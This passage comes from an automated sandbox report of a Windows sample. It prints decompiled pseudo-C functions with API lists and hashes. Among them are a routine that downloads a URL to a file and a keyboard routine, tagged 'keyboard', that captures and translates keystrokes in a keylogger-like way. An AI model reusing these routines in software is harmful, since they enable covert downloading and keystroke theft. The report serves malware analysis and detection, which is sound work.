                                                    0x00477382
                                                    0x0047738a
                                                    0x00477391
                                                    0x00477392
                                                    0x00477397
                                                    0x0047739a
                                                    0x004773ad
                                                    0x004773b1
                                                    0x004773b9
                                                    0x0047747b
                                                    0x0047747e
                                                    0x00477481
                                                    0x00477493
                                                    0x004773bf
                                                    0x004773ca
                                                    0x004773d3
                                                    0x004773e5
                                                    0x004773ed
                                                    0x004773fb
                                                    0x00477408
                                                    0x0047740d
                                                    0x00477412
                                                    0x00477418
                                                    0x00477433
                                                    0x0047743b
                                                    0x0047743e
                                                    0x0047744b
                                                    0x00477453
                                                    0x00477457
                                                    0x00477457
                                                    0x00477457
                                                    0x00477459
                                                    0x0047745e
                                                    0x00477461
                                                    0x00477464
                                                    0x00477471
                                                    0x00477471

                                                    APIs
                                                    • BeginUpdateResourceA.KERNEL32 ref: 004773A8
                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,00000000,00000000,00477494), ref: 00477418
                                                    • UpdateResourceA.KERNEL32 ref: 00477433
                                                    • EndUpdateResourceA.KERNEL32 ref: 00477444
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ResourceUpdate$BeginFreeLibrary
                                                    • String ID:
                                                    • API String ID: 2368538523-0
                                                    • Opcode ID: 07fed57a9aed454ea86297e705330f03264fc4d740f29f239a2a5f1fb7689370
                                                    • Instruction ID: 788fa2fdaf6e603f0e993ca8ed72eb25dca608fc93a6157178922b6ccb5e32dc
                                                    • Opcode Fuzzy Hash: 07fed57a9aed454ea86297e705330f03264fc4d740f29f239a2a5f1fb7689370
                                                    • Instruction Fuzzy Hash: 66317270B04205AFD701EBB9DC41BAEBBB9EB49704F5084BAF504F7291DA79AD00C799
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040CED0 Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0040CED0(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr* _t87;
				void* _t93;

				_t93 = __fp0;
				_v8 = __ecx;
				_t73 = __edx;
				_t87 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x49e668; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0040CEC4(_t73);
				} else {
					_v12 = _t73 - _v820.AllocationBase;
				}
				E00409FEC( &_v273, 0x104, E0040E020(0x5c) + 1);
				_t74 = 0x40d050;
				_t86 = 0x40d050;
				_t83 =  *0x408034; // 0x408080
				if(E00403D78(_t87, _t83) != 0) {
					_t74 = E00404E80( *((intOrPtr*)(_t87 + 4)));
					_t69 = E00409F88(_t74, 0x40d050);
					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
						_t86 = 0x40d054;
					}
				}
				_t51 =  *0x49ddfc; // 0x407dac
				_t16 = _t51 + 4; // 0xffd1
				_t53 =  *0x49e668; // 0x400000
				LoadStringA(E00405FDC(_t53),  *_t16,  &_v790, 0x100);
				E00403B3C( *_t87,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t74;
				_v832 = 6;
				_v828 = _t86;
				_v824 = 6;
				E0040A624(_v8,  &_v790, _a4, _t93, 4,  &_v860);
				return E00409F88(_v8, _t86);
			}































                                                    0x0040ced0
                                                    0x0040cedc
                                                    0x0040cedf
                                                    0x0040cee1
                                                    0x0040ceed
                                                    0x0040cefc
                                                    0x0040cf26
                                                    0x0040cf2c
                                                    0x0040cf38
                                                    0x0040cf3d
                                                    0x0040cf43
                                                    0x0040cf43
                                                    0x0040cf61
                                                    0x0040cf66
                                                    0x0040cf6b
                                                    0x0040cf72
                                                    0x0040cf7f
                                                    0x0040cf89
                                                    0x0040cf8d
                                                    0x0040cf94
                                                    0x0040cf9d
                                                    0x0040cf9d
                                                    0x0040cf94
                                                    0x0040cfae
                                                    0x0040cfb3
                                                    0x0040cfb7
                                                    0x0040cfc2
                                                    0x0040cfcf
                                                    0x0040cfda
                                                    0x0040cfe0
                                                    0x0040cfed
                                                    0x0040cff3
                                                    0x0040cffd
                                                    0x0040d003
                                                    0x0040d00a
                                                    0x0040d010
                                                    0x0040d017
                                                    0x0040d01d
                                                    0x0040d039
                                                    0x0040d04c

                                                    APIs
                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040CEED
                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040CF11
                                                    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040CF2C
                                                    • LoadStringA.USER32 ref: 0040CFC2
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                    • String ID:
                                                    • API String ID: 3990497365-0
                                                    • Opcode ID: 07f390f3552be5d48c375f75869cc29fee73cd4b235c895b91622e8669ee325a
                                                    • Instruction ID: b6cc919b410ec48c376b57bdd6b10f9d41704385299fbac947e4ea08e3070186
                                                    • Opcode Fuzzy Hash: 07f390f3552be5d48c375f75869cc29fee73cd4b235c895b91622e8669ee325a
                                                    • Instruction Fuzzy Hash: BE414270A002589BDB21DB69CC85BDAB7FDAB18305F0441FAA548F7282D7789F84CF59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040CECE Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0040CECE(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t85;
				intOrPtr _t89;
				intOrPtr* _t92;
				void* _t105;

				_v8 = __ecx;
				_t74 = __edx;
				_t92 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x49e668; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0040CEC4(_t74);
				} else {
					_v12 = _t74 - _v820.AllocationBase;
				}
				E00409FEC( &_v273, 0x104, E0040E020(0x5c) + 1);
				_t75 = 0x40d050;
				_t89 = 0x40d050;
				_t85 =  *0x408034; // 0x408080
				if(E00403D78(_t92, _t85) != 0) {
					_t75 = E00404E80( *((intOrPtr*)(_t92 + 4)));
					_t69 = E00409F88(_t75, 0x40d050);
					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
						_t89 = 0x40d054;
					}
				}
				_t51 =  *0x49ddfc; // 0x407dac
				_t16 = _t51 + 4; // 0xffd1
				_t53 =  *0x49e668; // 0x400000
				LoadStringA(E00405FDC(_t53),  *_t16,  &_v790, 0x100);
				E00403B3C( *_t92,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t75;
				_v832 = 6;
				_v828 = _t89;
				_v824 = 6;
				E0040A624(_v8,  &_v790, _a4, _t105, 4,  &_v860);
				return E00409F88(_v8, _t89);
			}































                                                    0x0040cedc
                                                    0x0040cedf
                                                    0x0040cee1
                                                    0x0040ceed
                                                    0x0040cefc
                                                    0x0040cf26
                                                    0x0040cf2c
                                                    0x0040cf38
                                                    0x0040cf3d
                                                    0x0040cf43
                                                    0x0040cf43
                                                    0x0040cf61
                                                    0x0040cf66
                                                    0x0040cf6b
                                                    0x0040cf72
                                                    0x0040cf7f
                                                    0x0040cf89
                                                    0x0040cf8d
                                                    0x0040cf94
                                                    0x0040cf9d
                                                    0x0040cf9d
                                                    0x0040cf94
                                                    0x0040cfae
                                                    0x0040cfb3
                                                    0x0040cfb7
                                                    0x0040cfc2
                                                    0x0040cfcf
                                                    0x0040cfda
                                                    0x0040cfe0
                                                    0x0040cfed
                                                    0x0040cff3
                                                    0x0040cffd
                                                    0x0040d003
                                                    0x0040d00a
                                                    0x0040d010
                                                    0x0040d017
                                                    0x0040d01d
                                                    0x0040d039
                                                    0x0040d04c

                                                    APIs
                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040CEED
                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040CF11
                                                    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040CF2C
                                                    • LoadStringA.USER32 ref: 0040CFC2
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                    • String ID:
                                                    • API String ID: 3990497365-0
                                                    • Opcode ID: 1c0917a406aa7aee44b8f202aeb6635a21d865d56fb6b92b010c2cb50a980a5f
                                                    • Instruction ID: 4fe94cffe00b8ae50479b7d7830d31852d6d04f91b779ba97ffbb5203982a357
                                                    • Opcode Fuzzy Hash: 1c0917a406aa7aee44b8f202aeb6635a21d865d56fb6b92b010c2cb50a980a5f
                                                    • Instruction Fuzzy Hash: 70415270A002589BDB21DB59CC85BDAB7FD9B18305F0441FAB548F7282D7789F88CB59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040E174 Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0040E174() {
				char _v152;
				short _v410;
				signed short _t14;
				signed int _t16;
				int _t18;
				void* _t20;
				void* _t23;
				int _t24;
				int _t26;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t37;
				int* _t39;
				short* _t41;
				void* _t49;

				 *0x49e744 = 0x409;
				 *0x49e748 = 9;
				 *0x49e74c = 1;
				_t14 = GetThreadLocale();
				if(_t14 != 0) {
					 *0x49e744 = _t14;
				}
				if(_t14 != 0) {
					 *0x49e748 = _t14 & 0x3ff;
					 *0x49e74c = (_t14 & 0x0000ffff) >> 0xa;
				}
				memcpy(0x49b134, 0x40e2c8, 8 << 2);
				if( *0x49b0ec != 2) {
					_t16 = GetSystemMetrics(0x4a);
					__eflags = _t16;
					 *0x49e751 = _t16 & 0xffffff00 | _t16 != 0x00000000;
					_t18 = GetSystemMetrics(0x2a);
					__eflags = _t18;
					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
					 *0x49e750 = _t31;
					__eflags = _t31;
					if(__eflags != 0) {
						return E0040E0FC(__eflags, _t49);
					}
				} else {
					_t20 = E0040E15C();
					if(_t20 != 0) {
						 *0x49e751 = 0;
						 *0x49e750 = 0;
						return _t20;
					}
					E0040E0FC(__eflags, _t49);
					_t37 = 0x20;
					_t23 = E00403718(0x49b134, 0x20, 0x40e2c8);
					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
					 *0x49e750 = _t32;
					__eflags = _t32;
					if(_t32 != 0) {
						 *0x49e751 = 0;
						return _t23;
					}
					_t24 = 0x80;
					_t39 =  &_v152;
					do {
						 *_t39 = _t24;
						_t24 = _t24 + 1;
						_t39 =  &(_t39[0]);
						__eflags = _t24 - 0x100;
					} while (_t24 != 0x100);
					_t26 =  *0x49e744; // 0x409
					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
					_t18 = 0x80;
					_t41 =  &_v410;
					while(1) {
						__eflags =  *_t41 - 2;
						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
						 *0x49e751 = _t37;
						__eflags = _t37;
						if(_t37 != 0) {
							goto L17;
						}
						_t41 = _t41 + 2;
						_t18 = _t18 - 1;
						__eflags = _t18;
						if(_t18 != 0) {
							continue;
						} else {
							return _t18;
						}
						L18:
					}
				}
				L17:
				return _t18;
				goto L18;
			}



















                                                    0x0040e180
                                                    0x0040e18a
                                                    0x0040e194
                                                    0x0040e19e
                                                    0x0040e1a5
                                                    0x0040e1a7
                                                    0x0040e1a7
                                                    0x0040e1af
                                                    0x0040e1bb
                                                    0x0040e1c7
                                                    0x0040e1c7
                                                    0x0040e1db
                                                    0x0040e1e4
                                                    0x0040e293
                                                    0x0040e298
                                                    0x0040e29d
                                                    0x0040e2a4
                                                    0x0040e2a9
                                                    0x0040e2ab
                                                    0x0040e2ae
                                                    0x0040e2b4
                                                    0x0040e2b6
                                                    0x00000000
                                                    0x0040e2be
                                                    0x0040e1ea
                                                    0x0040e1ea
                                                    0x0040e1f1
                                                    0x0040e1f3
                                                    0x0040e1fa
                                                    0x00000000
                                                    0x0040e1fa
                                                    0x0040e207
                                                    0x0040e217
                                                    0x0040e219
                                                    0x0040e21e
                                                    0x0040e221
                                                    0x0040e227
                                                    0x0040e229
                                                    0x0040e22b
                                                    0x00000000
                                                    0x0040e22b
                                                    0x0040e237
                                                    0x0040e23c
                                                    0x0040e242
                                                    0x0040e242
                                                    0x0040e244
                                                    0x0040e245
                                                    0x0040e246
                                                    0x0040e246
                                                    0x0040e262
                                                    0x0040e268
                                                    0x0040e26d
                                                    0x0040e272
                                                    0x0040e278
                                                    0x0040e278
                                                    0x0040e27c
                                                    0x0040e27f
                                                    0x0040e285
                                                    0x0040e287
                                                    0x00000000
                                                    0x00000000
                                                    0x0040e289
                                                    0x0040e28c
                                                    0x0040e28c
                                                    0x0040e28d
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0040e28d
                                                    0x0040e278
                                                    0x0040e2c5
                                                    0x0040e2c5
                                                    0x00000000

                                                    APIs
                                                    • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040E268
                                                    • GetThreadLocale.KERNEL32 ref: 0040E19E
                                                      • Part of subcall function 0040E0FC: GetCPInfo.KERNEL32(00000000,?), ref: 0040E115
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoLocaleStringThreadType
                                                    • String ID:
                                                    • API String ID: 1505017576-0
                                                    • Opcode ID: 1b5189a54573d4c7bc765412fd1a201bd6ca0c6f5f23b6c438d2b3680be01391
                                                    • Instruction ID: 1e0c14cada7a8142f74d55e3307cde86d26a5cdea6c2c893cd231fda4e8750a6
                                                    • Opcode Fuzzy Hash: 1b5189a54573d4c7bc765412fd1a201bd6ca0c6f5f23b6c438d2b3680be01391
                                                    • Instruction Fuzzy Hash: C13124316443958AE720D7A7AC017663B99E762344F0888FFE484AB3D2EB7C4855876F
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00474D50 Relevance: 6.1, APIs: 4, Instructions: 90networkfileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 61%
                                                    			E00474D50(void* __eax, void* __ebx, intOrPtr __edx, void* __esi) {
				intOrPtr _v8;
				char _v9;
				void* _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				void _v1060;
				char _v1392;
				char _v1856;
				DWORD* _t57;
				intOrPtr _t68;
				void* _t70;
				void* _t72;
				void* _t73;
				intOrPtr _t74;

				_t72 = _t73;
				_t74 = _t73 + 0xfffff8c4;
				_v1856 = 0;
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				_v8 = __edx;
				_t70 = __eax;
				_t57 =  &_v24;
				_push(_t72);
				_push(0x474f77);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				E00402B68(0,  &_v1856);
				E00409E18(_v1856,  &_v28);
				_v16 = InternetOpenA(E00404E80(_v28), 0, 0, 0, 0);
				_push(_t72);
				_push(0x474e92);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				_v20 = InternetOpenUrlA(_v16, E00404E80(_t70), 0, 0, 0x84000000, 0);
				_push(_t72);
				_push(0x474e74);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				E00402F1C( &_v1392, _v8, 0);
				E004028C4(E004035E4());
				do {
					InternetReadFile(_v20,  &_v1060, 0x400, _t57);
					E004028C4(E0040306C(0));
				} while ( *_t57 != 0);
				E004028C4(E0040308C( &_v1392));
				_v9 = 1;
				_pop(_t68);
				 *[fs:eax] = _t68;
				_push(0x474e7b);
				return InternetCloseHandle(_v20);
			}




















                                                    0x00474d51
                                                    0x00474d53
                                                    0x00474d5d
                                                    0x00474d63
                                                    0x00474d66
                                                    0x00474d69
                                                    0x00474d6c
                                                    0x00474d6f
                                                    0x00474d71
                                                    0x00474d76
                                                    0x00474d77
                                                    0x00474d7c
                                                    0x00474d7f
                                                    0x00474d8a
                                                    0x00474d98
                                                    0x00474db3
                                                    0x00474db8
                                                    0x00474db9
                                                    0x00474dbe
                                                    0x00474dc1
                                                    0x00474de0
                                                    0x00474de5
                                                    0x00474de6
                                                    0x00474deb
                                                    0x00474dee
                                                    0x00474dfa
                                                    0x00474e0f
                                                    0x00474e14
                                                    0x00474e25
                                                    0x00474e3f
                                                    0x00474e44
                                                    0x00474e54
                                                    0x00474e59
                                                    0x00474e5f
                                                    0x00474e62
                                                    0x00474e65
                                                    0x00474e73

                                                    APIs
                                                      • Part of subcall function 00402B68: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,?,00000000,00474795,004747D4,?,00000000,004747BE,?,?,?,?,00000000), ref: 00402B8C
                                                    • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00474DAE
                                                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,84000000,00000000), ref: 00474DDB
                                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 00474E25
                                                    • InternetCloseHandle.WININET(?), ref: 00474E6E
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internet$FileOpen$CloseHandleModuleNameRead
                                                    • String ID:
                                                    • API String ID: 1785656124-0
                                                    • Opcode ID: 258ed6f4a337dd00b29ed6c0571024dd33be25b5071fc36f155e22a10198ec8f
                                                    • Instruction ID: 9dd8df19d1045a063bc6dcad90270211b168fb7c8f28217f7d4554014ce166d6
                                                    • Opcode Fuzzy Hash: 258ed6f4a337dd00b29ed6c0571024dd33be25b5071fc36f155e22a10198ec8f
                                                    • Instruction Fuzzy Hash: 8D318670A00218ABDB11DFA5DC52BAEB7B8EB48704F91447AF504B72C1D7786A00CF68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00428D80 Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 64%
                                                    			E00428D80(intOrPtr __eax, void* __edx) {
				intOrPtr _v8;
				void* __ebx;
				void* __ecx;
				void* __esi;
				void* __ebp;
				intOrPtr _t33;
				struct HDC__* _t47;
				intOrPtr _t54;
				intOrPtr _t58;
				struct HDC__* _t66;
				void* _t67;
				intOrPtr _t76;
				void* _t81;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t86;

				_t84 = _t86;
				_push(_t67);
				_v8 = __eax;
				_t33 = _v8;
				if( *((intOrPtr*)(_t33 + 0x58)) == 0) {
					return _t33;
				} else {
					E004259F4(_v8);
					_push(_t84);
					_push(0x428e5f);
					_push( *[fs:eax]);
					 *[fs:eax] = _t86;
					E0042A188( *((intOrPtr*)(_v8 + 0x58)));
					E00428BFC( *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8));
					_t47 = E0042A288( *((intOrPtr*)(_v8 + 0x58)));
					_push(0);
					L004072E0();
					_t66 = _t47;
					_t81 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8);
					if(_t81 == 0) {
						 *((intOrPtr*)(_v8 + 0x5c)) = 0;
					} else {
						 *((intOrPtr*)(_v8 + 0x5c)) = SelectObject(_t66, _t81);
					}
					_t54 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28));
					_t82 =  *((intOrPtr*)(_t54 + 0x10));
					if(_t82 == 0) {
						 *((intOrPtr*)(_v8 + 0x60)) = 0;
					} else {
						_push(0xffffffff);
						_push(_t82);
						_push(_t66);
						L00407440();
						 *((intOrPtr*)(_v8 + 0x60)) = _t54;
						_push(_t66);
						L00407418();
					}
					E00425CE8(_v8, _t66);
					_t58 =  *0x49b8ac; // 0x22f0acc
					E0041AFE4(_t58, _t66, _t67, _v8, _t82);
					_pop(_t76);
					 *[fs:eax] = _t76;
					_push(0x428e66);
					return E00425B60(_v8);
				}
			}



















                                                    0x00428d81
                                                    0x00428d83
                                                    0x00428d86
                                                    0x00428d89
                                                    0x00428d90
                                                    0x00428e6a
                                                    0x00428d96
                                                    0x00428d99
                                                    0x00428da0
                                                    0x00428da1
                                                    0x00428da6
                                                    0x00428da9
                                                    0x00428db2
                                                    0x00428dc3
                                                    0x00428dce
                                                    0x00428dd3
                                                    0x00428dd5
                                                    0x00428dda
                                                    0x00428de5
                                                    0x00428dea
                                                    0x00428e00
                                                    0x00428dec
                                                    0x00428df6
                                                    0x00428df6
                                                    0x00428e09
                                                    0x00428e0c
                                                    0x00428e11
                                                    0x00428e2f
                                                    0x00428e13
                                                    0x00428e13
                                                    0x00428e15
                                                    0x00428e16
                                                    0x00428e17
                                                    0x00428e1f
                                                    0x00428e22
                                                    0x00428e23
                                                    0x00428e23
                                                    0x00428e37
                                                    0x00428e3f
                                                    0x00428e44
                                                    0x00428e4b
                                                    0x00428e4e
                                                    0x00428e51
                                                    0x00428e5e
                                                    0x00428e5e

                                                    APIs
                                                      • Part of subcall function 004259F4: RtlEnterCriticalSection.KERNEL32(0049E8C8,00000000,004244A2,00000000,00424501), ref: 004259FC
                                                      • Part of subcall function 004259F4: RtlLeaveCriticalSection.KERNEL32(0049E8C8,0049E8C8,00000000,004244A2,00000000,00424501), ref: 00425A09
                                                      • Part of subcall function 004259F4: RtlEnterCriticalSection.KERNEL32(00000038,0049E8C8,0049E8C8,00000000,004244A2,00000000,00424501), ref: 00425A12
                                                      • Part of subcall function 0042A288: 733AAC50.USER32(00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2DE
                                                      • Part of subcall function 0042A288: 733AAD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2F3
                                                      • Part of subcall function 0042A288: 733AAD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2FD
                                                      • Part of subcall function 0042A288: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A321
                                                      • Part of subcall function 0042A288: 733AB380.USER32(00000000,00000000,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A32C
                                                    • 733AA590.GDI32(00000000,00000000,00428E5F), ref: 00428DD5
                                                    • SelectObject.GDI32(00000000,?), ref: 00428DEE
                                                    • 733AB410.GDI32(00000000,?,000000FF,00000000,00000000,00428E5F), ref: 00428E17
                                                    • 733AB150.GDI32(00000000,00000000,?,000000FF,00000000,00000000,00428E5F), ref: 00428E23
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$Enter$A590B150B380B410CreateHalftoneLeaveObjectPaletteSelect
                                                    • String ID:
                                                    • API String ID: 2198039625-0
                                                    • Opcode ID: 5978f05ee8a23c54c1cf2e5b513bf4356140515cda6447ae178a7266121df848
                                                    • Instruction ID: e9c466939ba293ac9df73ed0eb373398a4389f67f4d1c2ae1c2642ffffdfa89f
                                                    • Opcode Fuzzy Hash: 5978f05ee8a23c54c1cf2e5b513bf4356140515cda6447ae178a7266121df848
                                                    • Instruction Fuzzy Hash: D2314870B05624EFC704DB59D981D5EB7E4EF08324BA241AAF404AB362CB38EE40DB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0047689C Relevance: 6.1, APIs: 4, Instructions: 81keyboardCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 76%
                                                    			E0047689C(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				short _v6;
				char _v262;
				int _v268;
				char _v272;
				struct HKL__* _t25;
				struct HKL__* _t28;
				int _t30;
				void* _t45;
				unsigned int _t52;
				intOrPtr _t56;
				int _t65;
				void* _t68;

				_v272 = 0;
				_v268 = 0;
				_t45 = __edx;
				_push(_t68);
				_push(0x47699d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t68 + 0xfffffef4;
				 *0x49ec4c = GetKeyboardLayout(0);
				GetKeyboardState( &_v262);
				_t25 =  *0x49ec4c; // 0x0
				_t28 =  *0x49ec4c; // 0x0
				_t65 =  *(_t45 + 4);
				_t30 = ToAsciiEx(_t65, MapVirtualKeyExA(_t65, 2, _t28),  &_v262,  &_v6, 0, _t25);
				_t52 =  *(_t45 + 8);
				if((_t52 & 0x80000000) != 0) {
					if((_t52 >> 0x0000001f & 0x00000001) == 1 && _t30 < 1 &&  *0x49ec50 != 0) {
						E00404BA8();
						E00476A9C(_t45, _v272,  *(_t45 + 4));
					}
				} else {
					if(_t30 <= 0) {
						 *0x49ec50 =  *(_t45 + 4);
					} else {
						E00404BA8();
						E00476A9C(_t45, _v268,  *(_t45 + 4));
						 *0x49ec50 = 0;
					}
				}
				_pop(_t56);
				 *[fs:eax] = _t56;
				_push(0x4769a4);
				return E004049E4( &_v272, 2);
			}















                                                    0x004768aa
                                                    0x004768b0
                                                    0x004768b6
                                                    0x004768bc
                                                    0x004768bd
